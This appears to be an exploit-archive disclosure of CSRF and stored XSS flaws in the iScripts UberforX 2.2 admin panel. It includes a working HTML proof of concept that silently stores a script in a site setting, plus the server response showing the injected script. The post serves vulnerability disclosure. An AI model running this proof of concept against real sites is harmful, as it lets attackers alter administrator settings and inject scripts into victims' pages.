iScripts UberforX 2.2 CSRF & Stored XSS in Admin Panel

Authors:Korprit Zombie         Risk:High
CVE:CVE-2018-10137            0day:CSRF 

CVE:CVE-2018-10136            0day:XSS

CVE:CVE-2018-10135            0day:XSS

0day-id:0DAY-10137             Date:2018-04-17



iScripts UberforX 2.2 has CSRF in the “manage_settings” section of the Admin Panel via the /cms?section=manage_settings&action=edit URI.


iScripts UberforX 2.2 has Stored XSS in the “manage_settings” section of the Admin Panel via a value field to the /cms?section=manage_settings&action=edit URI.


iScripts eSwap v2.4 has Reflected XSS via the “catwiseproducts.php” catid parameter in the User Panel.


# Exploit title: iScripts UberforX 2.2 - CSRF & Stored XSS in Admin Panel
# Date: 16/04/2018
# Exploit Author: ManhNho
# Vendor Homepage:
# Software Link:
# Demo Link:
# Version: 2.2
# CVE: CVE-2018-10135 CVE-2018-10136 CVE-2018-10137
# Tested on: Windows 10 / Kali Linux
# Category: Webapps

a) Send below crafted request to logged in user who is having Root Administrator level access
  <!-- CSRF PoC - ManhNho -->
  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="id" value="2" />
      <input type="hidden" name="cms&#95;set&#95;name" value="admin&#95;copyright" />
      <input type="hidden" name="cms&#95;set&#95;value" value="&lt;script&gt;alert&#40;&apos;1&apos;&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="submit" value="Save" />
      <input type="submit" value="Submit request" />
b) Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.
Website will popup alert '1'
HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 07:44:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 28359
<div class="footer row-fluid">
<p class="muted"><small><script>alert('1')</script></small></p>

Leave a Reply